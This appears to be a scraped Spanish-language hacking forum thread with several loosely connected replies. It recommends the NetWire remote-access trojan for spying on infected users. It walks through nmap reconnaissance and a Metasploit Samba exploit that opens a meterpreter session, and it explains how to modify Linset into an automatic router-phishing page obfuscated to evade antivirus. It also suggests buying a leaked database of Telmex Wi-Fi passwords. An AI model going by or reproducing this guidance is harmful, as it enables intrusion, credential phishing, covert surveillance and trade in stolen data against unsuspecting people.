Lo mas actual en noticias ,

                                Busqueda
Google Noticias :  Nation State Hackers / Russian Hackers / Chinese Hackers / Iran Hackers / APT / APT Groups
Los grupos APT acaparan los noticieros y son atakes a nivel global ,   

En este nivel  APT son los hackers mas sofisticados del mundo , o tambien conocidos como hackers de Elite  Las conferencias que se realizan como defcon. siempre se habla de ellos ,  Aunque estos temas si se tratan con cuidado ,   pero si son muy interesantes para una tarea o exposicion .

Hay conferencias sobre estos temas You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login 

hola un usb keylogger  am .

La unica solucion es netwire , cumple con esa funcion una ves infectando al sistema operativo
netwire es un rat multi plataforma persistente ,  Toda su actividad  de la persona infectada sera enviada a tu Control y comando  ,

Pagina netwire :  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Algo como esto Rubber Ducky no sirve en linux por la proteccion de apparmor y selinux a /media y /mount
la seguridad en linux no permite ese tipo de ejecucion ,  solamente siendo chroot  y necesitarias un exploit de privilegio  * kernel Local exploit privilege  0day

Energetic Bear o Turla Grupo  //  Fancy  y Cozy  son sus hijos de energetic  , algo asi como sus chavos ,  es muy seguro que alguno de ellos  fue el responsable

Hola necesitas un poco mas de informacion  ,

nmap -sV -sS -O -A -d2 192.168.0.1-254   // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed   Dispositivos sin firewall
- filtered  Dispositivos con firewall

reset ttl xxx   Es el sistema operativo  que tu exploit necesitara  , un ejemplo windows 10 da un resultado como este,  reset ttl 128
Lista de TTL  - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Cuando el resultado es este  /  All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo

nmap -sV -sS -O -A -d2 -Pn 192.168.xx

Una ves teniendo las  vulnerabilidades , el sistema , el estatus del firewall  ,   pasas al siguiente paso msf

msfconsole
msf>search scanner/samba 
msf>use auxiliary/scanner/smb/smb_version 
msfauxiliary(smb_version) > set RHOSTS You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) ,  Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El exploit te abrira tu session de meterpreter  ..

Los dispositivos que tienen Firewall / IDS / Intelligence Prevention ,  Necesitaras  guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port

Hola  para que pueda funcionar linset ,  como comentaban anteriormente necesitas  el certificado  SSL   ,  Aunque son  2 certificados que necesitaras  .

Como se llama lo que necesitaras .                 Pagina de pasos a realizar
Certificates for localhost  SSL                           You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login 
Android: Trusting SSL certificates                    You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Phishing Login Page Automatic Detected       You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Todo tiene que ir al puerto :443 incluido Linset  ,

Las herramientas de kali linux estan quemadas sobre todo SET , Beff etc etc  , Aqui perderas tiempo y necesitaras un Encode js , y base64 o base64-aes encode  , pero que no este quemado por virustotal .

Modificaras linset unicamente donde empieza el html !  ,  su index principal   ,  remplasarlo por la modificacion de Phishing del router que quieres atacar ,  Es necesario que sea automatico el Phishing  , porque detectara el dispositivo y sera rediregido a su tamaño y  diseño profesional ,   

La persona que atacaras no necesitara conocimientos , todo sera un ataque limpio  , y sin sospechas.

El problema esta en los firmware de kali  ,  Explicacion : Kali linux se actualiza cada cierto tiempo * meses , cuando copilan el kernel no todos los firmware * drivers  son añadidos a su version sobre todo los mas actuales  , y tendras que esperarte a su siguiente lanzamiento ,    pasa con  equipos actuales , 

Solucion :  A diferencia de Kali Debian tiende a trabajar mas en estas cuestiones   , 
Necesitas  los firmware mas actuales en tu distribucion  de kali instalada ,   

Son multi arquitectura .  Descargalas de aqui  / Paquetes que necesitaras  linux-nonfree , firmware-misc-nonfree ,

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login    

Cuando los descargues tendras un archivo asi  : firmware-linux-nonfree_20180825+dfsg-1_all.deb
Abres terminal .

instalas  en donde esta la ubicacion : dpkg -i  firmware-linux-nonfree_20180825+dfsg-1_all.deb

De igual forma instalas el siguiente firmware

Actualizas  initramfs -u

Reinicias tu computadora  ,  Automaticamente detectara tu red  y ya podras trabajar normalmente .

Los nuevos modem _2.4  2.4  , los diccionarios son inutiles para poder romper su seguridad  .  de igual forma linset  y herramientas evil
son obsoletas y no funcionan contra la nueva seguridad de los modems ,  totalplay y telmex ,  para hacer que funcionen necesitas certificados  https , y android confirm  que son costosos y privados , si no unicamente perderas tu tiempo viendo procesos inservibles , pero hay una solucion  n .n  ,  Como es mexico puedes conseguir la base de datos de  ( telmex con las contraseñas WAP2  de los modems xxxx y 2.4  , por estado o el pais completo existen 2 versiones  en XLS exel y en CSV texto ) de hay los vendedores de claves infinitum en facebook ,  no esta muy cara  por 500 pesos te la sueltan  y si que funciona

Hola ese tipos de temas no los encuentras aqui ,   A lo que tu te refieres es a la proteccion con cambio de informacion llamda Fingerprinting ! .

Fingerprinting es utilizada para evadir mecanismos de identificacion o de recoleccion de Inteligencia Artificial  ,  En la actualidad es normal ver distribuciones alteradas por seguridad del usuario ,   

No utilizo windows , pero creo al cambiar tus valores , con una actualizacion seran nuevamente los valores originales /
Ese tipo de seguridad se da en foros internacionales , como damagelab , exploit in  ccc etc aqui no encontraras nada al respecto .

Los a AV para linux no son seguros , A mi punto de vista  ,

Aqui puedes darte una idea ! de cual AV es mejor .

Billgates.Linux  ( chinese )  Infecta Linux  *2017
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sophos AV / Clam AV / Lo Detecta   -  Comodo  No es Detectado   * Aqui comodo queda obsoleto

Se prueva con otro Backdoor:Linux   (chinese DDOS )  * 2018
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sophos AV  / Lo detecta   -  Clam AV & Comodo No es Detectado .

Sophos AV esta mas Actualizado , pero unicamente detecta la amenaza cuando alguien por curiosidad sube un
malware a virustotal

La mayoria de personas cuando administran Linux Utilizan seguridad diferente , El cual da un grado mas profesional
IDS Suricata  Tiene una funcion mas avanzada
Firewall simple / UFW  ,  Con una buena configuracion  Tendras un firewall de amplio espectro
Kernel Personalizado  , Aqui es la diferencia del trabajo de una persona en seguridad


Por decir tu compañia se llama xcompany  , al copilar un kernel perzonalizado para el servidor linux se vera mas profesional  y tendra mucha mas seguridad .

un kernel simple
ubuntu root 4.17.0-041700-generic #1 SMP  11 Nov  12:08:44  UTC 2018 etc etc

un kernel perzonalizado
xcompany  root  123,456,789  x86_64 GNU/Linux

Por decir en este caso Tu trabajo de seguridad da un aspecto diferente ,centrando tu seguridad desde el nucleo , ocultando el string   para que no puedan identificar la version del kernel

Cuando se cambio el xcompany x el Ubuntu  al intentar analizar con nmap y algunos malware no podran infectarte por no detectar en su base el header xcompany  ,  incluso si por ahy un kid intenta pasarle armitage no tendra resultado

Es solo una opcion mas avanzada de seguridad .

Hola el mio es diferente un toke mas femenino / Blackhat